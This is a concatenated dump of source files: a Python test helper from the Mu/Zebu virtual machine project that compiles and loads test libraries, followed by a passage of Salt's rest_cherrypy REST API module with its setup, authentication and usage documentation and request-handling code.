t2 = threading.Thread(target = generate_baboons)
t2.start()
|
util.py
|
# Copyright 2017 The Australian National University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess as subp
import os, sys
import ctypes
import py
from multiprocessing import Process
CC = os.environ.get('CC', 'clang')
# if $MU_ZEBU is defined, use that as the project directory, else define from file.
MU_ZEBU = os.environ.get('MU_ZEBU', '')
proj_dir = py.path.local(MU_ZEBU) if MU_ZEBU else py.path.local(__file__).join('..', '..', '..')
test_jit_dir = proj_dir.join('tests', 'test_jit')
testsuite_dir = test_jit_dir.join('suite')
# testsuite_dir = py.path.local('/Users/johnz/Documents/Work/mu-client-pypy/rpython/translator/mu/test_impl')
bin_dir = py.path.local('emit') # put everything under emit
if not bin_dir.exists():
bin_dir.mkdir()
if sys.platform.startswith('darwin'):
libext = '.dylib'
elif sys.platform.startswith('linux'):
libext = '.so'
else:
libext = '.dll'
libmu_build = os.environ.get('ZEBU_BUILD', 'debug')
libmu_dir_path = proj_dir.join('target', libmu_build)
libmu_dylib_path = proj_dir.join('target', libmu_build, 'libmu' + libext)
libmu_staticlib_path = proj_dir.join('target', libmu_build, 'libmu.a')
def mu_instance_via_ctyeps():
libmu = preload_libmu()
class MuVM(ctypes.Structure):
pass
MuVM._fields_ = [
('header', ctypes.c_voidp),
('new_context', ctypes.c_voidp), # function pointers should have the same size as c_voidp
('id_of', ctypes.c_voidp),
('name_of', ctypes.c_voidp),
('set_trap_handler', ctypes.c_voidp),
('compile_to_sharedlib', ctypes.c_voidp),
('current_thread_as_mu_thread', ctypes.CFUNCTYPE(None, ctypes.POINTER(MuVM), ctypes.c_voidp)),
]
libmu.mu_fastimpl_new.restype = ctypes.POINTER(MuVM)
mu = libmu.mu_fastimpl_new()
mu.contents.current_thread_as_mu_thread(mu, None)
return mu
def compile_c_script(c_src_name):
testname = c_src_name[:-2]
src_c = testsuite_dir.join(c_src_name)
bin_path = bin_dir.join(testname)
CFLAGS = [
"-std=c11",
"-I%(proj_dir)s/src/vm/api" % globals(),
"-L" + libmu_dir_path.strpath,
"-lmu"
]
cmd = [CC] + CFLAGS + ['-o', bin_path.strpath] + [src_c.strpath]
# compile
p = subp.Popen(cmd, stdout=subp.PIPE, stderr=subp.PIPE, env=os.environ)
out, err = p.communicate()
if p.returncode != 0: # failed
sys.stdout.write(out + '\n')
sys.stderr.write(err + '\n')
raise subp.CalledProcessError(p.returncode, cmd)
os.environ['LD_LIBRARY_PATH'] = "%s:%s" % (libmu_dir_path.strpath,
os.environ['LD_LIBRARY_PATH'] if 'LD_LIBRARY_PATH' in os.environ else "")
# run
p = subp.Popen([bin_path.strpath], stdout=subp.PIPE, stderr=subp.PIPE, env=os.environ)
out, err = p.communicate()
if p.returncode != 0: # failed
sys.stdout.write(out + '\n')
sys.stderr.write(err + '\n')
raise subp.CalledProcessError(p.returncode, bin_path)
return py.path.local('emit').join('lib%(testname)s' % locals() + libext)
def ctypes_fncptr_from_lib(libpath, fnc_name, argtypes=[], restype=ctypes.c_longlong, mode=ctypes.RTLD_GLOBAL):
lib = ctypes.CDLL(libpath.strpath, mode)
fnp = getattr(lib, fnc_name)
fnp.argtypes = argtypes
fnp.restype = restype
return fnp, lib
def rffi_fncptr_from_lib(libpath, fnc_name, llargtypes, restype, mode=ctypes.RTLD_GLOBAL):
from rpython.rtyper.lltypesystem import rffi
from rpython.translator.platform import platform
if platform.name.startswith('linux'):
link_extra = ['-Wl,-R' + libpath.dirpath().strpath]
else:
link_extra = []
libname = libpath.basename[3:libpath.basename.index(libext)]
if mode == ctypes.RTLD_GLOBAL:
lib = ctypes.CDLL(libpath.strpath, mode) # preload lib using RTLD_GLOBAL
return rffi.llexternal(fnc_name, llargtypes, restype,
compilation_info=rffi.ExternalCompilationInfo(
libraries=[libname],
library_dirs=[libpath.dirpath().strpath],
link_extra=link_extra
),
_nowrapper=True)
def fncptr_from_c_script(c_src_name, name, argtypes=[], restype=ctypes.c_ulonglong, mode=ctypes.RTLD_GLOBAL):
libpath = compile_c_script(c_src_name)
return ctypes_fncptr_from_lib(libpath, name, argtypes, restype, mode)
def is_ctypes(t):
return isinstance(t, type(ctypes.c_longlong))
def fncptr_from_py_script(py_fnc, heapinit_fnc, name, argtypes=[], restype=ctypes.c_longlong, mode=ctypes.RTLD_GLOBAL, **kwargs):
import os
# NOTE: requires mu-client-pypy
from rpython.rlib.rmu import zebu as rmu
# load libmu before rffi so to load it with RTLD_GLOBAL
libmu = preload_libmu()
emit_dir = kwargs.get('muemitdir', os.environ.get('MU_EMIT_DIR', 'emit'))
mu = rmu.MuVM("--aot-emit-dir=%(emit_dir)s" % locals())
ctx = mu.new_context()
bldr = ctx.new_ir_builder()
id_dict = py_fnc(bldr, rmu)
bldr.load()
if heapinit_fnc:
heapinit_fnc(ctx, id_dict, rmu)
libpath = py.path.local(emit_dir).join('lib%(name)s' % locals() + libext)
mu.compile_to_sharedlib(libpath.strpath, [])
if (len(argtypes) > 0 and is_ctypes(argtypes[0])) or is_ctypes(restype):
return ctypes_fncptr_from_lib(libpath, name, argtypes, restype, mode), (mu, ctx, bldr)
else:
return rffi_fncptr_from_lib(libpath, name, argtypes, restype, mode), (mu, ctx, bldr)
def preload_libmu():
# load libmu before rffi so to load it with RTLD_GLOBAL
return ctypes.CDLL(libmu_dylib_path.strpath, ctypes.RTLD_GLOBAL)
spawn_proc = bool(int(os.environ.get('SPAWN_PROC', '1')))
def may_spawn_proc(test_fnc):
def wrapper():
if spawn_proc:
p = Process(target=test_fnc, args=tuple())
p.start()
p.join()
assert p.exitcode == 0
else:
test_fnc()
return wrapper
def fncptr_from_rpy_func(rpy_fnc, llargtypes, llrestype, mode=ctypes.RTLD_GLOBAL, **kwargs):
# NOTE: requires mu-client-pypy
from rpython.rtyper.lltypesystem import rffi
from rpython.translator.interactive import Translation
from rpython.config.translationoption import set_opt_level
preload_libmu()
emit_dir = os.environ.get('MU_EMIT_DIR', str(bin_dir))
kwargs.setdefault('backend', 'mu')
kwargs.setdefault('impl', 'zebu')
kwargs.setdefault('codegen', 'api')
kwargs.setdefault('testjit', True)
kwargs.setdefault('vmargs', "--aot-emit-dir=" + emit_dir)
kwargs.setdefault('suplibdir', str(bin_dir))
kwargs.setdefault('no_ovf', True)
t = Translation(rpy_fnc, llargtypes, **kwargs)
set_opt_level(t.config, '3')
if kwargs['backend'] == 'mu':
db, bdlgen, fnc_name = t.compile_mu()
emit_dir = py.path.local(emit_dir)
libpath = emit_dir.join('lib%(fnc_name)s' % locals() + libext)
bdlgen.mu.compile_to_sharedlib(libpath.strpath, [])
extras = (db, bdlgen)
else:
libpath = t.compile_c()
fnc_name = 'pypy_g_' + rpy_fnc.__name__
extras = None
return rffi_fncptr_from_lib(libpath, fnc_name, llargtypes, llrestype, mode), extras
|
app.py
|
"""
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
.. note::
This module is Experimental on Windows platforms and supports limited
configurations:
- doesn't support PAM authentication (i.e. external_auth: auto)
- doesn't support SSL (i.e. disable_ssl: True)
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log.access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log.error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9,2017.7.3,2018.3.0
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: 2018.3.0
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=pam
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`Client APIs <client-apis>` documentation, but
in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<client-interfaces>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running asynchronous jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
"""
import functools
import io
import itertools
import logging
import os
import signal
import tarfile
from collections.abc import Iterator, Mapping
from multiprocessing import Pipe, Process
from urllib.parse import parse_qsl
import cherrypy # pylint: disable=import-error,3rd-party-module-not-gated
import salt
import salt.auth
import salt.exceptions
import salt.netapi
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
import salt.utils.versions
import salt.utils.yaml
logger = logging.getLogger(__name__)
try:
from cherrypy.lib import ( # pylint: disable=import-error,3rd-party-module-not-gated
cpstats,
)
except AttributeError:
cpstats = None
logger.warn(
"Import of cherrypy.cpstats failed. "
"Possible upstream bug: "
"https://github.com/cherrypy/cherrypy/issues/1444"
)
except ImportError:
cpstats = None
logger.warn("Import of cherrypy.cpstats failed.")
try:
# Imports related to websocket
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type("websockets", (object,), {"SynchronizingWebsocket": None})
HAS_WEBSOCKETS = False
def html_override_tool():
"""
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
"""
apiopts = cherrypy.config["apiopts"]
request = cherrypy.request
url_blacklist = (
apiopts.get("app_path", "/app"),
apiopts.get("static_path", "/static"),
)
if "app" not in cherrypy.config["apiopts"]:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get("Accept") == "*/*":
return
try:
wants_html = cherrypy.lib.cptools.accept("text/html")
except cherrypy.HTTPError:
return
else:
if wants_html != "text/html":
return
raise cherrypy.InternalRedirect(apiopts.get("app_path", "/app"))
def salt_token_tool():
"""
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
"""
x_auth = cherrypy.request.headers.get("X-Auth-Token", None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie["session_id"] = x_auth
def salt_api_acl_tool(username, request):
"""
.. versionadded:: 2016.3.0
Verifies user requests against the API whitelist. (User/IP pair)
in order to provide whitelisting for the API similar to the
master, but over the API.
..code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
"""
failure_str = "[api_acl] Authentication failed for " "user {0} from IP {1}"
success_str = "[api_acl] Authentication successful for user {0} from IP {1}"
pass_str = "[api_acl] Authentication not checked for " "user {0} from IP {1}"
acl = None
# Salt Configuration
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get("api_acl", None)
ip = request.remote.ip
if acl:
users = acl.get("users", {})
if users:
if username in users:
if ip in users[username] or "*" in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and "*" in users:
if ip in users["*"] or "*" in users["*"]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
"""
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
"""
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get("authorized_ips", None)
if auth_ip_list:
logger.debug("Found IP list: {}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get("Remote-Addr", None)
logger.debug("Request from IP: {}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {}".format(rem_ip))
raise cherrypy.HTTPError(403, "Bad IP")
def salt_auth_tool():
"""
Redirect all unauthenticated requests to the login page
"""
# Redirect to the login page if the session hasn't been authed
if "token" not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers["Cache-Control"] = "private"
def cors_tool():
"""
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
"""
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head["Access-Control-Allow-Origin"] = req_head.get("Origin", "*")
resp_head["Access-Control-Expose-Headers"] = "GET, POST"
resp_head["Access-Control-Allow-Credentials"] = "true"
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == "OPTIONS":
ac_method = req_head.get("Access-Control-Request-Method", None)
allowed_methods = ["GET", "POST"]
allowed_headers = [
"Content-Type",
"X-Auth-Token",
"X-Requested-With",
]
if ac_method and ac_method in allowed_methods:
resp_head["Access-Control-Allow-Methods"] = ", ".join(allowed_methods)
resp_head["Access-Control-Allow-Headers"] = ", ".join(allowed_headers)
resp_head["Connection"] = "keep-alive"
resp_head["Access-Control-Max-Age"] = "1400"
# Note: CherryPy on Py3 uses binary objects for the response
# Python 2.6 also supports the byte prefix, so no need for conditionals
cherrypy.response.body = b""
cherrypy.response.status = 200
# CORS requests should short-circuit the other tools.
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session["token"] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
("application/json", salt.utils.json.dumps),
(
"application/x-yaml",
functools.partial(salt.utils.yaml.safe_dump, default_flow_style=False),
),
)
def hypermedia_handler(*args, **kwargs):
"""
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
"""
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (
salt.exceptions.AuthenticationError,
salt.exceptions.AuthorizationError,
salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError,
):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (
salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError,
) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc: # pylint: disable=broad-except
# The TimeoutError exception class was removed in CherryPy in 12.0.0, but
# Still check existence of TimeoutError and handle in CherryPy < 12.
# The check was moved down from the SaltClientTimeout error line because
# A one-line if statement throws a BaseException inheritance TypeError.
if hasattr(cherrypy, "TimeoutError") and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug(
"Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True,
)
cherrypy.response.status = 500
ret = {
"status": cherrypy.response.status,
"return": "{}".format(traceback.format_exc(exc))
if cherrypy.config["debug"]
else "An unexpected error occurred",
}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers["Content-Type"] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
return salt.utils.stringutils.to_bytes(response)
except Exception: # pylint: disable=broad-except
msg = "Could not serialize the return data from Salt."
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
"""
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
"""
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
"""
A decorator to skip a processor function if process_request_body is False
"""
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
"""
Accept x-www-form-urlencoded data and reformat it into a Low State
data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
